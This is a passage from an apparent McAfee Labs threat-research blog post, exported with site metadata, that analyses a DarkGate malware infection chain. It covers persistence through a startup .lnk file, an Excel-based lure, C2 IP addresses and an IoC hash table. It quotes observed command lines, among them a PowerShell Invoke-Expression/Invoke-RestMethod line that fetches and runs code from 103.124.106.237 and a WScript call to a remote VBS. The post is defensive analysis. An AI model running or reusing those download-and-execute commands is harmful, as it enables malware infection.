height=\"513\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture26.png 578w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture26-300x266.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture26-145x129.png 145w\" sizes=\"auto, (max-width: 578px) 100vw, 578px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 26: Shellcode C directing to entry point of the PE file<\/p>\n<p>Upon debugging this code, we figured out that in marked \u201ccall eax\u201d instruction, eax has the address of the entry point of the final DarkGate payload. Hence this instruction finally moves the Instruction Pointer to the entry point of the PE file. This goes to the same region marked in yellow in Figure 24.<\/p>\n<p>This is the final DarkGate payload which is a Delphi-compiled executable file:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190747 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture27.png\" alt=\"\" width=\"490\" height=\"306\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture27.png 490w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture27-300x187.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture27-205x129.png 205w\" sizes=\"auto, (max-width: 490px) 100vw, 490px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 27: Darkgate payload.<\/p>\n<p>Upon this, we see all the network activity happening to C2 site:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190762 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture28.png\" alt=\"\" width=\"626\" height=\"251\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture28.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture28-300x120.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture28-205x82.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 28: Network Communication<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190777 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture29.png\" alt=\"\" width=\"782\" height=\"150\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture29.png 782w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture29-300x58.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture29-768x147.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture29-205x39.png 205w\" sizes=\"auto, (max-width: 782px) 100vw, 782px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 29: C2 IP address<\/p>\n<p>The exfiltration is done to the IP address 5.252.177.207.<\/p>\n<p><strong>Persistence:<\/strong><\/p>\n<p>For maintaining persistence, a .lnk file is dropped in startup folder:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190792 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture30-1.png\" alt=\"\" width=\"611\" height=\"271\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture30-1.png 611w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture30-1-300x133.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture30-1-205x91.png 205w\" sizes=\"auto, (max-width: 611px) 100vw, 611px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 30: Persistence<\/p>\n<p>Content of lnk file:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190807 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture31.png\" alt=\"\" width=\"579\" height=\"142\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture31.png 579w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture31-300x74.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture31-205x50.png 205w\" sizes=\"auto, (max-width: 579px) 100vw, 579px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 31: Content of .lnk used for persistence<\/p>\n<p>The shortcut file (lnk) drops a folder named &#8220;hakeede&#8221; in the &#8220;C:\\ProgramData&#8221; directory.<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190822 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture32.png\" alt=\"\" width=\"570\" height=\"204\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture32.png 570w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture32-300x107.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture32-205x73.png 205w\" sizes=\"auto, (max-width: 570px) 100vw, 570px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 32: Folder dropped in &#8220;C:\\ProgramData&#8221;<\/p>\n<p>Inside this folder, all the same files are present:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190837 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture33.png\" alt=\"\" width=\"464\" height=\"161\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture33.png 464w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture33-300x104.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture33-205x71.png 205w\" sizes=\"auto, (max-width: 464px) 100vw, 464px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 33: Same set of files present in dropped folder<\/p>\n<p>Again, the ahk file is executed with the help of Autohotkey.exe and shellcode present in test.txt is executed. These files have the same SHA256 value, differing only in their assigned names.<\/p>\n<p><strong>Infection from XLS:<\/strong><\/p>\n<p>The malicious excel file asks the user to click on \u201cOpen\u201d to view the content properly.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190852 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture34.png\" alt=\"\" width=\"626\" height=\"299\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture34.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture34-300x143.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture34-205x98.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/p>\n<p>Figure 34: XLS sample<\/p>\n<p>Upon clicking on \u201cOpen\u201d button, user gets the following prompt warning the user before opening the file.<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190882 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture35.png\" alt=\"\" width=\"330\" height=\"207\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture35.png 330w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture35-300x188.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture35-205x129.png 205w\" sizes=\"auto, (max-width: 330px) 100vw, 330px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 35: XLS files trying to download and run VBS file<\/p>\n<p>For our analysis, we allowed the activity by clicking on \u201cOK\u201d. Following this we got the process tree as:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190897 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture36-1.png\" alt=\"\" width=\"626\" height=\"74\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture36-1.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture36-1-300x35.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture36-1-205x24.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 36: Process tree from Excel file<\/p>\n<p>The command lines are:<\/p>\n<ul>\n<li>&#8220;C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE&#8221; &#8220;C:\\Users\\admin\\Documents\\Cluster\\10-apr-xls\\1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4.xlsx&#8221;\n<ul>\n<li>&#8220;C:\\Windows\\System32\\WScript.exe&#8221; &#8220;\\\\45.89.53.187\\s\\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs&#8221;\n<ul>\n<li>&#8220;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&#8221; -Command Invoke-Expression (Invoke-RestMethod -Uri &#8216;103.124.106.237\/wctaehcw&#8217;)\n<ul>\n<li>\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1<\/li>\n<li>&#8220;C:\\kady\\AutoHotkey.exe&#8221; C:\/kady\/script.ahk<\/li>\n<li>&#8220;C:\\Windows\\system32\\attrib.exe&#8221; +h C:\/kady\/<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>The file it gets from \u201c103.124.106[.]237\/wctaehcw\u201d has the following content:<\/p>\n<p><center><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-190912 size-full\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture37.png\" alt=\"\" width=\"626\" height=\"127\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture37.png 626w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture37-300x61.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/Picture37-205x42.png 205w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/center><\/p>\n<p style=\"text-align: center;\">Figure 37: Remote script simliar to previous chain<\/p>\n<p>From this point onward, the infection process mirrors the previously discussed chain. All three files, including AutoHotKey.exe, a script file, and a text file, are downloaded, with identical artifacts observed throughout the process.<\/p>\n<p><strong>Mitigation:<\/strong><\/p>\n<ul>\n<li>Verify Sender Information<\/li>\n<li>Think Before Clicking Links and Warnings<\/li>\n<li>Check for Spelling and Grammar Errors<\/li>\n<li>Be Cautious with Email Content<\/li>\n<li>Verify Unusual Requests<\/li>\n<li>Use Email Spam Filters<\/li>\n<li>Check for Secure HTTP Connections<\/li>\n<li>Delete Suspicious Emails<\/li>\n<li>Keep Windows and Security Software Up to date<\/li>\n<\/ul>\n<p><strong>Indicators of Compromise (IoCs):<\/strong><\/p>\n<table>\n<tbody>\n<tr>\n<td width=\"85\"><strong>File<\/strong><\/td>\n<td width=\"539\"><strong>Hash<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"85\">Html file<\/td>\n<td width=\"539\">196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005<\/td>\n<\/tr>\n<tr>\n<td width=\"85\">URL file<\/td>\n<td width=\"539\">2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833<\/td>\n<\/tr>\n<tr>\n<td width=\"85\">VBS<\/td>\n<td width=\"539\">038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907<\/td>\n<\/tr>\n<tr>\n<td width=\"85\">autohotkey.exe<\/td>\n<td width=\"539\">897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb<\/td>\n<\/tr>\n<tr>\n<td width=\"85\">AHK script<\/td>\n<td width=\"539\">dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455<\/td>\n<\/tr>\n<tr>\n<td width=\"85\">test.txt<\/td>\n<td width=\"539\">4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795<\/td>\n<\/tr>\n<tr>\n<td width=\"85\">DarkGate exe<\/td>\n<td width=\"539\">6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031<\/td>\n<\/tr>\n<tr>\n<td width=\"85\">IP<\/td>\n<td width=\"539\">5.252.177.207<\/td>\n<\/tr>\n<tr>\n<td width=\"85\">XLS file<\/td>\n<td width=\"539\">1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4<\/td>\n<\/tr>\n<tr>\n<td width=\"85\">VBS<\/td>\n<td width=\"539\">2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f<\/td>\n<\/tr>\n<tr>\n<td width=\"85\">LNK file<\/td>\n<td width=\"539\">10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e<\/td>\n<\/tr>\n<tr>\n<td width=\"85\">IP<\/td>\n<td width=\"539\">103.124.106.237<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\">Table 1: IOC table<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena McAfee Labs has recently uncovered a novel infection chain associated with&#8230;<\/p>\n","protected":false},"author":695,"featured_media":190932,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[],"coauthors":[4136],"class_list":["post-190356","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>The Darkgate Menace: Leveraging Autohotkey &amp; Attempt to Evade Smartscreen | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"The Darkgate Menace: Leveraging Autohotkey &amp; Attempt to Evade Smartscreen | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2024-04-29T18:09:03+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"McAfee Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee_Labs\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee Labs\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/\"},\"author\":{\"name\":\"McAfee Labs\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\"},\"headline\":\"The Darkgate Menace: Leveraging Autohotkey &#038; Attempt to Evade Smartscreen\",\"datePublished\":\"2024-04-29T18:09:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/\"},\"wordCount\":2301,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png\",\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/\",\"name\":\"The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png\",\"datePublished\":\"2024-04-29T18:09:03+00:00\",\"description\":\"Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png\",\"width\":300,\"height\":200},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"The Darkgate Menace: Leveraging Autohotkey &#038; Attempt to Evade Smartscreen\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\",\"name\":\"McAfee Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"caption\":\"McAfee Labs\"},\"description\":\"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee_Labs\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen | McAfee Blog","description":"Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen | McAfee Blog","og_description":"Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware.","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2024-04-29T18:09:03+00:00","og_image":[{"width":300,"height":200,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png","type":"image\/png"}],"author":"McAfee Labs","twitter_card":"summary_large_image","twitter_creator":"@McAfee_Labs","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee Labs","Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/"},"author":{"name":"McAfee Labs","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad"},"headline":"The Darkgate Menace: Leveraging Autohotkey &#038; Attempt to Evade Smartscreen","datePublished":"2024-04-29T18:09:03+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/"},"wordCount":2301,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png","articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/","name":"The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png","datePublished":"2024-04-29T18:09:03+00:00","description":"Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware.","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/04\/300x200_Blog_021323.png","width":300,"height":200},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"The Darkgate Menace: Leveraging Autohotkey &#038; Attempt to Evade Smartscreen"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security 